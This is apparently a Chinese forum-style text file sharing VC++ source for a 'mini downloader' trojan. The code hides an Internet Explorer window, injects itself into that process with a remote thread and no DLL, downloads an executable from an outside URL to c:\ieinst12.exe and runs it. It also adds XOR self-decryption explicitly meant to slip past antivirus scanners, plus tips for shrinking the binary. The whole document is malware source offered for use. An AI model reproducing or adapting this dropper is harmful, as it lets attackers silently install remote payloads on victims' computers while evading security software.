无dll插入线程.txt

无dll插入线程 无dll插入线程

无dll插入进程，下载者vc源代码

增加代码xor解密功能,以逃过杀毒软件.

生成mini下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可.

参考delphi版本的下载者源代码，编出来有16k左右。压缩也有10k多，
于是写了vc的代码。按以下的设置，编译出来2k左右。
还可以可以再设置一下编译开关，以减小体积。

ps:原代码中4处没有对\转义,以下代码编译通过;
编译出来16k,去掉4行注释,编译后3k(编译环境:win2003+vc6.0) 
/* 
"mini_downloader" 
code by kardinal p.s.t 
compile by vc++ 6.0 
can not run under win98; 
*/ 
#include <windows.h> 

#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"kernel32.lib") 

//#pragma comment(linker, "/opt:nowin98") //取消这4行的注释，可编译出2k大的文件 
//#pragma comment(linker, "/merge:.data=.text") 
//#pragma comment(linker, "/merge:.rdata=.text") 
//#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/entry:decrpt") 
#pragma comment(linker, "/subsystem:windows") 
#pragma comment(linker, "/base:0x13150000") 

hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );//动态加载shell32.dll中的shellexecutea函数 
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);//动态加载urlmon.dll中的urldownloadtofilea函数 
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); //建立远程线程,并运行 
handle processhandle; 
dword pid; 
hinstance hshell,hurlmon,hkernel; 

void download() //注入使用的下载函数 
{ 
hshell=loadlibrary("shell32.dll"); 
hurlmon=loadlibrary("urlmon.dll"); 

(farproc&)shellrun=getprocaddress(hshell,"shellexecutea"); 
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea"); 

downfile(null,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null); 
shellrun(0,"open","c:\\ieinst12.exe",null,null,5); 
exitprocess(0); 
}; 

void main() //主函数 
{ 
//1.得到ie路径,并运行 
char iename[max_path],iepath[max_path]; 
zeromemory(iename,sizeof(iename)); 
zeromemory(iepath,sizeof(iepath)); 

getwindowsdirectory(iepath,max_path); 
strncpy(iename,iepath,3); 
strcat(iename,"program files\\internet explorer\\iexplore.exe"); 
winexec(iename,sw_hide); 
sleep(500); 

//2.得到 ie process handle 
hwnd htemp; 
htemp=findwindow("ieframe",null); 
getwindowthreadprocessid(htemp,&pid); 
processhandle=openprocess(process_all_access, false, pid); 

//3.分配内存 
hmodule module; 
lpvoid newmodule; 
dword size; 
lpdword lpimagesize; 

module = getmodulehandle(null);//进程映像的基址 
//得到内存镜像大小 
_asm 
{ 
push eax; 
push ebx; 
mov ebx,module; 
mov eax,[ebx+0x3c]; 
lea eax,[ebx+eax+0x50]; 
mov eax,[eax] 
mov lpimagesize,eax; 
pop ebx; 
pop eax; 
}; 
size=(dword)lpimagesize; 
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); //确定起始基址和内存映像基址的位置 

//4.写内存，创建线程 

writeprocessmemory(processhandle, newmodule, module, size, null);//写数据 
lpthread_start_routine entrypoint; 
__asm 
{ 
push eax; 
lea eax,download; 
mov entrypoint,eax; 
pop eax 
} 
hkernel=loadlibrary("kernel32.dll"); 
(farproc&)myinject= getprocaddress(hkernel,"createremotethread"); 
myinject(processhandle, null, 0, entrypoint, module, 0, null); //建立远程线程,并运行 

//5.关闭对象 
closehandle(processhandle); 

return; 
} ; 

//解密函数 
void decrpt() 
{ 

handle myps; 
dword oldattr; 
byte shellcode[500]; 
zeromemory(shellcode,sizeof(shellcode)); 
myps=getcurrentprocess(); 
::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr); 
//先把原代码,搬移到变量中保存起来 
_asm 
{ 
pushad; 
lea esi,download 
lea edi,shellcode; 
lea ecx,decrpt; 
sub ecx,esi; 
en1: 
lodsb; 
stosb; 
dec ecx; 
jne en1; 
popad; 

}; 

//解密搬回 
int i; 
for (i=1;i<=0xff;i++) 
{ 
_asm 
{ 
pushad; 
lea esi,shellcode; 
lea edi,download; 
lea ecx,decrpt; 
sub ecx,edi; 
en2: 
lodsb; 
mov ebx,i; 
xor al,bl; 
stosb; 
dec ecx; 
jne en2; 
popad; 

}; 

//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒. 
__try 
{ 
main(); 
return; 
} 
__except(exception_execute_handler) 

{ 

}; 


} 
return; 
};